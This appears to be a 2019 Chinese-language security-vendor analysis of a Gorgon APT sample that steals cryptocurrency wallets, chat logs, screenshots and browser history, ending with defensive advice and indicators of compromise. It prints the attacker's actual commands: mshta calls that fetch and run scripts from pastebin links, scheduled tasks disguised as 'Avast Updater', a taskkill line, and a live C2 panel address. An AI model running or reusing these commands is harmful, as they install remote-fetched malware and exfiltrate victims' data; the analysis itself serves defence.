後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包

深信服千里目發表於2019-09-18
GoAPT黑客

背景

Gorgon APT組織是一個被認為來自巴基斯坦的攻擊組織,該組織在2018年8月份由Palo Alto Unit42團隊進行披露,主要針對全球外貿人士進行攻擊。除此之外,安全研究人員還發現Gorgon針對英國、西班牙、俄羅斯、美國等政府目標發起了攻擊,算是APT組織的後起之秀,最近一年非常活躍。

近日,深信服安全團隊發現了Gorgon APT組織最新變種樣本,此樣本釋放了一個盜取受害者虛擬幣錢包的木馬。

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包 /攻擊流程圖/


樣本分析

1.樣本中包含惡意的巨集程式碼,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包 

2.通過動態除錯,巨集程式碼呼叫mshta.exe執行mshta http://bitly.com/6xdfsSXsh6,訪問短連結網址http://bitly.com/6xdfsSXsh6,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包

3.短連結跳轉到網站:https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html,網站包含惡意指令碼,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包 

4.解密裡面的惡意指令碼,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包 


5.呼叫mshta.exe執行mshta.exe  http://www.pastebin.com/raw/UZEbWMK9,訪問http://www.pastebin.com/raw/UZEbWMK9網站的內容,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包 

6.解密上面的惡意指令碼內容,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包 


7.呼叫cmd.exe程式,執行如下命令,結束相關程式:

"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit


8.將以下命令,寫入自啟動登錄檔項:

mshta.exe http://pastebin.com/raw/hJjQuQv1


9.通過命令,建立兩個計劃任務啟動項Avast Updater和Avast backup,如下所示:

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 30 /tn "Avast Updater" /tr "mshta.exe http://pastebin.com/raw/BrH6UFRc" /F

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 300 /tn "Avast backup" /tr "mshta.exe http://pastebin.com/raw/nhcP3XgH" /F


10.上面三個自啟動項,分別執行三個不同的指令碼,如下所示:

http://pastebin.com/raw/hJjQuQv1

http://pastebin.com/raw/BrH6UFRc

http://pastebin.com/raw/nhcP3XgH

hJjQuQv1指令碼解密之後,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包

 BrH6UFRc指令碼解密之後,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包 再次解密指令碼,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包 

11.下載https://pastebin.com/raw/dkrjWec2指令碼並執行,指令碼內容,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包 解密指令碼之後,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包 

12.解密之後替換裡面的字串,然後載入執行,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包 

13.替換之後,是一個PE檔案,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包 


14.通過檢視這個PE檔案為NET編寫的注入程式,如下所示:

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包 

15.將PE程式注入到calc.exe程式中,下載https://pastebin.com/raw/j8mRken0指令碼內容,然後替換裡面的@!並執行,指令碼內容,如下所示: 後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包


16.解密指令碼之後也是一個PE檔案,如下所示:

 後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包


17.把這個解密出來的PE程式通過上面解密出來的PE注入程式,注入到calc.exe程式中,此PE程式,盜取受害者虛擬錢包資料,例如比特幣,萊特幣等,如下所示: 後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包


18.盜取受害者聊天工具記錄,例如:Skype、Telegram等,如下所示: 

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包


19.螢幕截圖操作,如下所示: 後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包


20.獲取受害者主機相關資訊,當前IP地址或區域資訊以及磁碟檔名等,如下所示: 後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包


21.盜取受害者瀏覽器歷史記錄資訊等,如下所示: 

後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包


22.遠端伺服器URL:http://216.170.126.139/Panel/10/index.php,捕獲到的資料包流量,如下所示:

 後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包


23.nhcP3XgH指令碼解密之後,如下所示:

 後起之秀:Gorgon APT黑客組織覬覦虛擬貨幣錢包


安全建議

不管攻擊者的入侵計劃是多麼的縝密,總會由於技術的限制留下些許蛛絲馬跡,譬如軟體的植入、網路流量的產生,這些痕跡可能並不足以作為APT攻擊的證據,但一旦發現,就必須提高警惕,並及時的儲存現場,通知安全相關人員,對疑似感染的主機進行隔離和檢查。同時也要注意日常防範措施,在思想上和技術上雙管齊下:

1、加強人員安全防範意識。不要開啟來歷不明的郵件附件,對於郵件附件中的檔案要謹慎執行,如發現指令碼或其他可執行檔案可先使用防毒軟體進行掃描;

2、升級office系列軟體到最新版本,不要隨意執行不可信文件中的巨集;

3、部署分層控制,實現深度網路安全防禦,構建端到端的立體安全防護網路。在網路規劃時需要充分考慮終端接入安全、內網安全防護、應用系統安全等多個維度,並根據不同的業務需求和安全等級進行合理的分割槽隔離;

4、重視網路資料、系統執行狀態的審計和分析。嚴格把控系統的訪問許可權,持續對資料流的進出進行有效的監控,及時更新安全補丁,定時進行安全配置基線的審視和系統安全風險的評估,及時發現可以行為並通過通訊線路加密、應用層安全掃描與防護、隔離等有效技術手段將可能的安全風險扼殺在搖籃裡。


IOCs

MD5:

A137185171B1176FC125A74250928933  

A5DE91F73A5E75AA7E33954FD0ADDA13

E0CE8A86F85C506591BE8897C07FB626

URL:

http://bitly.com/6xdfsSXsh6

https://sxasxasxssaxxsasxasx.blogspot.com/p/don-bigi.html

http://www.pastebin.com/raw/UZEbWMK9

http://pastebin.com/raw/hJjQuQv1

http://pastebin.com/raw/BrH6UFRc

http://pastebin.com/raw/nhcP3XgH

http://216.170.126.139/Panel/10/index.php

IP :

216.170.126.139

相關文章